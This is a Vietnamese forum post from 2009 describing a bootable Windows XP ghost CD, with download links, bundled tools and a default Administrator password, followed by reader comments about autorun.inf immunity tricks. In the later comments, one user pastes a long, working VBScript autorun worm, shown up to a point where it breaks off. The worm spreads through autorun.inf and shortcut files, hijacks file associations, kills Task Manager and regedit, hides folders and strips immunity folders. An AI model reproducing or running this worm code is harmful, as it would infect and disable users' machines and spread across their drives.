NamPT Ghost CD (NGCD):
Tổng dung lượng dữ liệu khi burn ra đĩa: 682MB.
Dung lượng file ảnh ghost: 636MB.
Dung lượng Mini Windows XP: 39MB.
Dung lượng phần khởi động và MS-DOS: 4.5MB.
Cập nhật phiên bản mới lúc: 13h ngày 03/10/2009

1. Mô tả file ảnh ghost:
Tên file: NamPT.gho.

Dữ liệu bên trong file NamPT.gho:

- Hệ điều hành: Windows XP Professional SP2, mật khẩu Administrator: nampt.com, file system: NTFS, trong thư mục gốc có 1 file autorun.inf có dung lượng 0 byte chỉ có Administrator mới có quyền xóa, sửa, xem, dùng để chống lại virus gắn file autorun.inf mới vào ổ đĩa chứa hệ điều hành để điều hướng kích hoạt virus mỗi khi truy cập vào ổ đĩa này. Hệ điều hành đã được tùy chỉnh để phụ hợp nhất cho đa số người sử dụng như: Tính năng autorun chỉ hoạt động khi đưa ổ CD/DVD vào còn những ổ đĩa khác như ổ cứng, ổ gắn ngoài, ổ RAM,… đều vô hiệu hóa tính năng autorun,… Các phần mềm đã cài đặt trong hệ điều hành:

- IE8 – Trình duyệt Internet Explorer 8.

- K-Lite Codec Pack 2.34 – Mã và giải mã các định dạng nhạc thông dụng trên Windows.

- Microsoft Office 2003: Word, Excel, PowerPoint.

- Foxit Reader 3.1.1.901 – Mở file PDF.

- WinRAR 3.80 – Nén, giải nén các định dạng file nén thông dụng.

- Unikey 4.0 RC2 – Bộ gõ tiếng Việt Unikey mới nhất.

- Fonts: Cung cấp thêm 150 fonts TCVN3, font VNI-Times.

WOT for Internet Explorer - Phòng tránh virus khi lướt web.

- Antivirus: Để tiết kiệm dung lượng file ghost có thể đặt trong 1 CD duy nhất. Bộ cài chương trình diệt virus và các tiện ích kèm theo được tích hợp vào trong file ghost và tự động cài khi đăng nhập vào Windows lần đầu tiên. Tập hợp lệnh cài đặt được đặt trong 1 file .bat, được cài hoàn toàn tự động, bạn chỉ việc chờ đợi và tắt cửa sổ dòng lệnh khi có yêu cầu.

2. Mô tả Mini Windows XP:

Mini Windows XP được lấy từ Hirent’s Boot CD 10.0 dùng để Ghost lại hệ thống khi bạn ghost trong MS-DOS mà máy báo lỗi do nguyên nhân của máy chứ không phải hỏng đĩa hoặc sao lưu dữ liệu khi cần ghost lại hệ thống hoặc làm những việc nào đó mà bạn muốn trên giao diện trực quan, thân thuộc của Windows XP nếu máy tính cần khắc phục bị lỗi không vào được Windows. Để sử dụng được Mini Windows XP yêu cầu máy có tối thiểu 256MB RAM. Nếu không muốn sử dụng Mini Windows XP hoặc ko muốn burn ra 1 đĩa có dữ liệu chiếm hết dung lượng CD khiến xác suất hỏng CD sớm hơn thì bạn có thể bỏ phần này. Nó gồm 5 files nằm trong thư mục NGCD: XP, XP.BIN, XP.CA_, XP.DAT, XPLOADER.BIN. File XP.CA_ là file chính có dung lượng lớn nhất, 4 file còn lại có tổng dung lượng 343KB. Nếu thật sự bạn muốn xóa Mini Windows XP bạn hãy dùng UltraISO Premium Edition 9 mở và xóa để tránh mất khả năng khởi động của đĩa (địa chỉ download sẽ liệt kê sau).

3. Mô tả Phần khởi động CD và MS-DOS:

- Hỗ trợ khởi động từ đĩa cứng.

- Hỗ trợ khởi động MS-DOS từ CD.

- Hỗ trợ khởi động Mini Windows XP.

- Hỗ trợ phân tích bộ nhớ máy tính.

MS-DOS gồm các phần chính:

- One Click to ghost: Menu này là menu đầu tiên có tên: “Bung file ghost NamPT.gho trong CD-ROM vao partition 1 cua disk 1”, đây là chức năng chính nhất của NGCD, khi chọn menu này máy lập tức nạp chương trình và tiến hành ghost, ghost xong thì khởi động lại (nếu lúc này BIOS đang để chọn khởi động mặc định là ổ cứng thì đây là khoảng thời gian chờ đợi khá dài mà bạn không phải làm gì cho đến khi bản Windows cài đặt xong). Tiến trình tự nhận driver bắt đầu từ lần khởi động lại này, sau khi nhận hết driver (desktop & laptop đều bình đẳng) máy sẽ khởi động lại và vào Windows.

- Menu thứ 2 là Norton Ghost 11.5: Chạy chương trình ghost theo cách thông thường.

- Menu thứ 3 là Partition Magic Pro 8.05: Chia ổ đĩa mới, chia ổ đĩa không mất dữ liệu, sửa lỗi ổ đĩa, …

- Menu thứ tư là Chuyen phan vung khoi dong primary voi pqboot: Chức năng này thường không sử dụng đến nếu ổ cứng của bạn chỉ có 1 phân vùng khởi động Primary.

- Menu thứ 5 là Active Password Changer 3.0.420 (NT/2000/XP/2003/Vista): Dùng để phá mật khẩu cho các user trong Windows khi mọi user có quyền Administrators đều quên mật khẩu.

- Menu cuối cùng là MS-DOS: Khởi động 1 mình MS-DOS mà không kèm khởi động 1 trong các chức năng ở trên.

Đây là 1 đĩa CD đầy đủ 1 cách tiết kiệm dung lượng nhất, từ lựa chọn các chương trình cài đặt vào Windows trong bản ghost, căn dung lượng file ghost, căn dung lượng ghi ra CD, khởi động từ CD, các chương trình sửa lỗi thông dụng cho máy tính. Ngoài ra MS-DOS trong CD này mặc định hỗ trợ nhận hầu hết các USB của các hãng nổi tiếng mà không phải lựa chọn như Hirent's boot cd.

Đĩa CD này nhắm đến phục vụ cho cá nhân có thể tự sửa máy tính cho mình 1 cách dễ dàng, đơn giản, nhanh chóng, giao diện hoàn toàn bằng tiếng Việt. Đặc biệt hướng đến các kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính. Mọi thông tin Windows trong file ghost đều cố gắng không định danh 1 ai cả.

4. Download:

- Để hỗ trợ download nhanh hơn bạn hãy cài chương trình IDM. Nếu máy bạn chưa cài IDM có thể download IDM 5.15 portable tại đây:
http://www.mediafire.com/file/nmdlnzdnljo/IDM-5.15.exe
Sau khi download và kích hoạt IDM xong bạn lưu đường dẫn bài viết này lại: http://nampt.com/CNTT/Thu-thuat/NamPT-Ghost-CD-Dia-Ghost-tu-nhan-driver-1-CD-duy-nhat-tich-hop-khoi-dong-DOS/Default.aspx và khởi động lại trình duyệt để hoàn thành việc tích hợp IDM vào trình duyệt.

Tiếp đó bạn download MediaFire Downloader 1.1.5.0 (MFD):
http://www.mediafire.com/file/nyzcujymwij/MediaFire.Downloader.1.1.5.0.New.rar tiện ích này dùng để download hàng loạt fles theo danh sách, tất cả các file trong 1 link của thư mục,... từ trang mediafire.com. Download xong bạn cài đặt nó, quá trình cài đặt có thể đòi hỏi DotNetFrameWork, nếu bạn không cài được theo hướng dẫn của file cài đặt có thể vào địa chỉ sau để xem hướng dẫn cách cài: http://nampt.com/CNTT/Thu-thuat/Tien-ich-tu-dong-cap-nhat-Bkav-Home-hang-ngay/Default.aspx. Sau khi đã cài đặt xong bạn xem tiếp các hướng dẫn bên dưới và copy các đường link vào MediaFire Downloader để thực hiện download tự động. Nếu phần mềm MediaFire Downloader này không làm bạn hài lòng hãy comment lại, tôi sẽ viết cho các bạn 1 phần mềm tương tự, hoàn thiện hơn, giao diện tiếng Việt để lần sau sử dụng.

- Download NamPT Ghost CD:
http://www.mediafire.com/NamPTGhostCD (link tạm thời) hoặc:

http://www.mediafire.com/?sharekey=8c98f8e8e60e548fd0d290dca69ceb5cf3f8c707 8f9354ccd6e38d13f15c3e80

Đây là địa chỉ thư mục NamPTGhostCD. Khi vào địa chỉ này bạn sẽ thấy có 7 file .rar cần download. Bạn download lần lượt chúng (đừng đổi tên bất kỳ file nào). Sau khi đã download hết bạn đặt chung vào 1 thư mục, rồi tiến hành giải nén. (Hướng dẫn trên dùng MFD thì bạn chỉ việc copy link của thư mục này vào MFD là nó tự nhận 7 file rar kia)

Nếu máy bạn chưa cài winrar có thể download winrar 3.80 tại đây:
http://www.mediafire.com/file/yttkkm5ykex/WinRAR.zip
chương trình winrar này tôi nén bằng file .zip, file zip là loại file nén được Windows XP hỗ trợ sẵn nên bạn download về nhấp chuột phải vào nó chọn extract all… để giải nén rồi tiến hành cài đặt.

Tiến hành giải nén 7 file rar: Nhấp chuột phải vào 1 trong 7 file đó rồi chọn extract here. Giải nén xong ta được file NamPT Ghost CD.iso.

Nếu bạn không muốn chỉnh sửa gì file này thì hãy burn ra đĩa CD. Hãy chọn 1 CD trắng loại thật tốt để burn, nguyên nhân là vì dung lượng file ghost trong CD chiếm hầu hết dung lượng CD, nếu loại CD không được tốt lắm chỉ cần có 1 xước hoặc lỗi nhỏ ở phần dữ liệu file ghost này thì file ghost bị lỗi ngay và CD đó xem như vứt đi, thường CD không tốt thì chỉ sử dụng được vài lần là vứt đĩa, nếu CD tốt thì khó xước đĩa hơn và nếu có xước thì có thể vẫn không gây lỗi, mặt khác cd ghost này không chỉ để cứu hộ cho máy tính của mình mà còn để cứu nhiều máy khác mà không phải máy nào cũng có đầu đọc đĩa CD-ROM tốt cả.

Nếu bạn chưa cài chương trình burn đĩa nào hỗ trợ burn đĩa từ file .ISO hãy download và cài đặt chương trình UltraISO 9 premium edition, địa chỉ download:
http://www.mediafire.com/file/tbgi5mkginz/uiso9_pe.rar

Chương trình này cũng có thể sửa nội dung bên trong file .ISO mà không làm mất khả năng boot từ CD như tôi đã nói ở mục 2. Mô tả Mini Windows XP.

5. Chỉnh sửa nội dung bên trong NamPT Ghost CD.iso:

- Trường hợp 1: Để nguyên mọi thứ, kiếm 1 CD trắng loại tốt, burn ra là bạn đã có 1 đĩa ghost hoàn chỉnh.

- Trường hợp 2: Để giảm dung lượng burn ra CD bạn có thể hi sinh chức năng Mini Windows XP bằng cách dùng UltraISO để sửa như hướng dẫn ở mục 2.

- Trường hợp 3: Nếu bạn là kỹ thuật viên, cá nhân, tổ chức cứu hộ máy tính, có thể thay thế ảnh trong file NamPT.gho có địa chỉ là C:\syspref\logo.bmp để được 1 đĩa ghost như ý, hiển thị thông tin của chính bạn bằng cách mở NamPT Ghost CD.iso bằng UltraISO rồi kéo thả file NamPT.gho ra đâu đó, sau đó dùng file ghostexp.exe:
http://www.mediafire.com/file/3nnqmjy3mkr/Ghostexp.zip để sửa file gho đó bằng cách mở file GhostExp.exe, nhấn Ctrl + O tìm đến file NamPT.gho đã kéo thả ra ngoài.

Cửa số mới hiện ra và thay thế file logo.bmp như hình hướng dẫn sau:

http://nampt.com/Files/nampt/ghoexp.JPG

Chú ý: file logo.bmp có kích thước 800x600 pixels, mỗi lần kéo thả logo.bmp vào kích thước file gho sẽ tăng lên 469 KB.

Sau khi đã kéo logo.bmp vào thì tắt hộp thoại này lại và tiến hành kéo thả NamPT.gho vào file NamPT Ghost CD.iso đã mở trước đó bằng UltraISO và lưu lại là bạn sẽ được 1 bản ghost như chính bạn làm ra vậy mà không mất nhiều thời gian.

Phan Thanh Nam

Down phát đầu tiên mở hàng nào!
Cám ơn bác đã chia sẻ và hưỡng dẫn chi tiết!

cám ơn anh chimboica nhiều.không biết nó có nhận Dual Core không anh

Nhận hết, bios nhận là nó nhận. :))

Bạn ơi,cái link số 3 die rồi

Trước tiên cũng rất cám ơn bác đã chia sẻ, xong bác nói là nhận tất cả các drivers cho cả laptop và desktop với dung lượng bản ghost chỉ có 1 CD thì nghi ngờ quá. Hơn nữa, cách xử lý là tạo 1 file autorun.inf để chống lại virus autorun thì có vẻ bác theo cảm tính quá. Chẳng lẽ con virus đó nó lại không tính đến chuyện bác dùng CACLS để đặt thuộc tính cho nó? Quyền Admin có bằng quyền System không? Nếu tạo file autorun.inf thì không qua mặt được nó đâu bác ạ. Tất nhiên cũng có cách nhưng phải là tạo thư mục autorun.inf và trong thư mục đó cần xử lý thêm nữa.

Bạn ơi, ko biết bạn có cách gì để modified/delete file autorun.inf đó. Có thì cũng tốt, post lên cho anh em học hỏi. Mình ko dùng cacls (ko biết viết thế có đúng ko) như hướng dẫn trên mạng bạn ạ. Trên mạng chỉ hướng dẫn cacls với everyone chứ mình login vào chính tài khoản administrator rồi tạo file autorun.inf, deny full control cho tất cả các groups: Administrators, Authenticated Users, SYSTEM, Users, ngoại trừ user: Administrator. Điểm nhấn của nó là login vào administrator rồi tạo file và sửa quuyền truy cập ở đây chứ ko phải thao tác trên user đang sử dụng. Administrator thì mình ko bao giờ sử dụng để làm các việc thông thường. Nếu virus muốn modified/delete thì phải biết mật khẩu administrator, mật khẩu thì mình đã cài đặt (nampt.com) chứ không phải để trống.

Còn cái bạn nghi ngờ về driver là hoàn toàn đúng. Nó không thể nhận được tất cả driver cho mọi máy tính, nhưng những máy tính đang tồn tại và bạn gặp nó hàng ngày thì % nhận được driver là rất cao, mình đã làm nhiều bản ghost dựa trên bộ driver này và chưa máy tính nào nhận thiếu driver, ngoại trừ các tiện ích điều khiển tốc độ CPU, touchpad và driver bluetooth cho laptop.

Quả thật những vấn đề nghi ngờ của bạn là rất hay mình liệt vào good question, có thế mình mới có cơ hội nhớ ra và đưa lên mạng thêm 1 số cách riêng để mọi người tham khảo

[=========> Bổ sung bài viết <=========]


Bạn ơi,cái link số 3 die rồi

Mình đã test kỹ, không có cái link nào die cả. Bạn hãy xóa cookie của trình duyệt hoặc khởi động lại máy hoặc cả 2 thì sẽ download đc link 3 đó. Hoặc cách đơn giản hơn là đổi trình duyệt để download link 3 đó.

Tạo folder autorun.inf để làm giả autorun thì có thể dùng cacls hoặc có thể tạo một sub folder tên "con" trong folder autorun.inf. Nhưng mấy cách mình biết trên chắc cổ lổ xỉ và virus nó "biết" hết rồi, các bạn có cách tốt hơn mong đc chia sẽ :)
Còn về driver thì chủ yếu là driver "phổ thông" để có thể tạm thời vào windows suôn sẽ (ví dụ driver ethernet chẳng hạn) nếu có thể lên mạng đc thì có thể tải các driver chính thức của thiết bị/laptop đó rồi. Dù sao đây cũng là đĩa cứu hộ chứ đâu phải là đĩa tập hợp driver đâu :)

Bạn ơi cám ơn vì chia sẻ
Nhưng đĩa này mình cũng đã tự làm rồi nhận Driver rất ngon nhưng máy chạy tốn nhiều tài nguyên hệ thống lắm không bằng Driver chính của Main

Tại sao tạo thư mục AUTORUN.INF rồi xử lý thêm 1 thư mục bên trong nó nữa lại không được nhỉ? Bác đã test thử chưa? Kể cả dùng thằng Unlocker cũng bó tay với nó đấy.
Còn đây là code của virus, các bác coi thử xem, tôi sưu tầm được thôi:

on Error Resume Next
Dim Fso,WshShell
Set Fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
Call Main()
Sub Main()
on Error Resume Next
Dim Args, VirusLoad, VirusAss
Set Args = WScript.Arguments
VirusLoad = GetMainVirus(1)
VirusAss = GetMainVirus(0)
ArgNum = 0
Do While ArgNum < Args.Count
Param = Param & " " & Args(ArgNum)
ArgNum = ArgNum + 1
Loop
SubParam = LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath = Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "bat", "cmd"
RunPath = "CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "reg"
RunPath = "regedit.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "chm"
RunPath = "hh.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "hlp"
RunPath = "winhlp32.exe " & """" & Trim(Param) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "dir"
RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "oie"
RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "omc"
RunPath = "explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case "emc"
RunPath = "explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
Case Else
If PreDblInstance = True Then
WScript.Quit
End If
Timeout = DateDiff("ww", GetInfectedDate, Date) - 12
If Timeout > 0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
Call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
on Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames = Array("taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe")
VBSFullNames = Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
on Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 or Drive.DriveType = 2 or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath) = False or FSO.FileExists(VirusLoadPath) = False or FSO.FileExists(HostFilePath) = False or GetVersion() < Version Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\ open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\ open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\ open\command\") <> File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\ open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\ open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\ open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell \open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\ open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\i explore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
on Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
on Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub CreateFile(code, pathf)
on Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
on Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\NOHIDDE N\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL \CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
on Error Resume Next
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
on Error Resume Next
ImmunityFolder = D & ":\Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub
Sub KeepProcess(VBSFullNames)
on Error Resume Next
For Each VBSFullName In VBSFullNames
If VBSProcessCount(VBSFullName) < 2 Then
Run("%SystemRoot%\system\svchost.exe " & VBSFullName)
End If
Next
End Sub
Function GetSystemDrive()
GetSystemDrive = Left(Fso.GetSpecialFolder(0),2)
End Function
Function GetFileSystemType(Drive)
Set d = FSO.GetDrive(Drive)
GetFileSystemType = d.FileSystem
End Function
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Sub SetHiddenAttr(path)
on Error Resume Next
Dim vf
Set vf = FSO.GetFile(path)
Set vf = FSO.GetFolder(path)
vf.Attributes = 6
End Sub
Sub Run(ExeFullName)
on Error Resume Next
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
Sub InfectRoot(D,VirusName)
on Error Resume Next
Dim VBSCode
VBSCode = GetCode(WScript.ScriptFullName)
VBSPath = D & ":\" & VirusName
If FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
End If
Set Folder = Fso.GetFolder(D & ":\")
Set SubFolders = Folder.Subfolders
For Each SubFolder In SubFolders
SetHiddenAttr(SubFolder.Path)
LnkPath = D & ":\" & SubFolder.Name & ".lnk"
TargetPath = D & ":\" & VirusName
Args = """" & D & ":\" & SubFolder.Name & "\Dir"""
If Fso.FileExists(LnkPath) = False or GetTargetPath(LnkPath) <> TargetPath Then
If Fso.FileExists(LnkPath) = True Then
FSO.DeleteFile LnkPath, True
End If
Call CreateShortcut(LnkPath,TargetPath,Args)
End If
Next
End Sub
Sub CreateShortcut(LnkPath,TargetPath,Args)
Set Shortcut = WshShell.CreateShortcut(LnkPath)
With Shortcut
.TargetPath = TargetPath
.Arguments = Args
.WindowStyle = 4
.IconLocation = "%SystemRoot%\System32\Shell32.dll, 3"
.Save
End With
End Sub
Sub CreateAutoRun(D,VirusName)
on Error Resume Next
Dim InfPath, VBSPath, VBSCode
InfPath = D & ":\AutoRun.inf"
VBSPath = D & ":\" & VirusName
VBSCode = GetCode(WScript.ScriptFullName)
If FSO.FileExists(InfPath) = False or FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
StrInf = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open=´ò¿ª(&O)" & vbCrLf & "shell\open\command=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)" & vbCrLf & "shell\explore\command=WScript.exe " & VirusName & " ""AutoRun"""
Call KillImmunity(D)
Call CreateFile(StrInf, InfPath)
Call SetHiddenAttr(InfPath)
End If
End Sub
Sub SetTxtFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIniFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetInfFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetBatFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetCmdFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\ open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
on Error Resume Next
Dim Value
